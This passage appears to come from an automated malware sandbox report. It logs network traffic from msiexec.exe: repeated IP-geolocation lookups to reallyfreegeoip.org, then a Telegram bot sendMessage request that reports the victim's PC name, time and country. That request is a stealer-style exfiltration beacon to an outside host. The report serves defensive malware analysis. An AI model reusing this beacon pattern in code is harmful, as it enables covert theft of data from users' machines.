                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.749790104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          2024-12-17 12:21:50 UTC874INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:50 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426879
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeggHvHPZ6GKQcOhRmirA8lGjZa83fgLqagvzVJiKFve1bwh3QQYnP5T1bLegfAndqpVDZvsaF3FDn0hrloJm1kWDw%2F7RyAiEgNXQ7erKNHjeeemrU9kI%2Bp8TfZ5Bb0Ww1yJKyNi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e00b7ba343ad-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1612&rtt_var=610&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1784841&cwnd=203&unsent_bytes=0&cid=f418aab08f252da7&ts=454&x=0"
                                                                                                                                                          2024-12-17 12:21:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.749797104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:21:53 UTC878INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:52 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426881
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELQRpmAA9tuqpjQ5NEP%2FWkNcQX6i19wH8dYdVrnccYxuKCjVTTPBelH19YP6m4xz4p8rCc8Ej29ld8qfg%2BU7pvO%2FgRzUuwyfc4kf4LLM8hzd%2FZllfiUJZ1C4Ful8QvwPWJ4DNHee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e01d791a4258-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1596&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=181&unsent_bytes=0&cid=9a4830ddf2cdd478&ts=453&x=0"
                                                                                                                                                          2024-12-17 12:21:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.749808104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:56 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:21:56 UTC878INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:56 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426885
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1cvTudLvy0L6xBGi5hLuNrCtk4Lhkw2W2skUlIDTGFt7WPbi8jylauciF1eDynRsINSjMK0G6DA0EIT6WxjHoKWmtCwg%2BGdhGuJM26c%2BtEFPA5HiksKB%2F23FOBW6I%2BwaguBC8lA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e033687d43e0-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1728&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1613259&cwnd=247&unsent_bytes=0&cid=8f49b00c8ba04f1d&ts=452&x=0"
                                                                                                                                                          2024-12-17 12:21:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.749815104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:59 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:21:59 UTC884INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:59 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426888
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOejd%2BdI9bWj0kpMoPpMSOQM6IUpdBlZewmHY7SDnGg3fYBY1fpzwss56jKBSYlr092uqZ9z3MiMcgeYO1%2FG6w%2FMPlPt6%2FnNfPdReJlSV3%2F%2F5356A%2BSkmLb7aJ3Kh1LJjzllykRO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e04588074264-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1595&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=220&unsent_bytes=0&cid=a7de6a8653dbe261&ts=454&x=0"
                                                                                                                                                          2024-12-17 12:21:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.749823104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:22:01 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          2024-12-17 12:22:02 UTC878INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:02 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426891
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQDRpMyWTTcf6LFrCJoe79NDSqko52pSEn6ZASiJshGUPylmd3gT0uJnsmAkiaLa0e0%2BWV%2Fgdr%2F2V1qJZrpYJnCPgYOHlkmEQN3E8NZkO05K6PnNbRXNkoh7fJBDBqjyC%2BUuRUCD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e0578c7e19c7-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1855&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1574123&cwnd=146&unsent_bytes=0&cid=9880b4d4c29986b7&ts=455&x=0"
                                                                                                                                                          2024-12-17 12:22:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.749834104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:22:04 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          2024-12-17 12:22:05 UTC882INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:05 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426894
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BxX8Kuydj1H67yr4%2FBHh1cMU%2F96vcrP0pZCidgU%2BYZSVKUwte3lAVGYZZROMziWF592sUMNUTdSpccd7XsKp21phWWu49e5l%2BP1Zli5OnY83CI%2FUxa56YhJtp1XUwdlTKNMLqYuB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e0699c5f8c2d-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2088&min_rtt=2025&rtt_var=805&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1441975&cwnd=247&unsent_bytes=0&cid=6d6996db7f788749&ts=457&x=0"
                                                                                                                                                          2024-12-17 12:22:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          9192.168.2.749841104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:22:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:22:08 UTC886INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:08 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426897
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsasZ24Dg4l%2FQ48JX551RTPrJaR27RdHHb2P6s9tgPYSd2iApHtenW9588w8wP4mLZbAry0CPJu6%2BZTWMnB8B1hnJwmnRwuA3u%2Bl0Jb54%2BVaGMST7MM6kk%2FsmP%2B9ohg%2Fu%2FVqXQJ0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e07c1fa578db-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1569048&cwnd=237&unsent_bytes=0&cid=96e840be20eeeb5f&ts=456&x=0"
                                                                                                                                                          2024-12-17 12:22:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          10192.168.2.749848104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:22:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:22:11 UTC878INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:10 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426899
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7Sv1euSZqjUMaKBWv5kei4aKDXK%2F2l5d7Nf4jyDh12EhAlSYjswF2uIKsDV946JnjXT8D3HIz87vd2hvwG%2FQxi%2BWw0Uhy6fYSlWO%2FhuJqRqfvaO3pwx67J96PRfabxi4uBL5rIg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36e08e1f49189d-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1495&rtt_var=580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1855146&cwnd=190&unsent_bytes=0&cid=8832fc8cf5f88f75&ts=455&x=0"
                                                                                                                                                          2024-12-17 12:22:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          11192.168.2.749854149.154.167.2204437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:22:12 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:22:13 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:12 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 55
                                                                                                                                                          Connection: close
                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                          2024-12-17 12:22:13 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Click to jump to process

